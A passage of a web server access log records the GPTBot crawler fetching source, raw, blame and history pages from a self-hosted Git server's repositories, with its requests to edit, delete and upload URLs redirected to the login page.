compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22265] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:16:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11848] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22143] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:16:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibcrypto-3-x64.dll" [Client 74.7.227.38] [Length 23788] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13182] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13182] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html" [Client 74.7.227.38] [Length 99885] [Gzip 10.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:35:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10043] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11259] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11462] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11883] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:16:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29830] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 945] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 10220] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10534] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11762] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10043] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:35:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:35:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 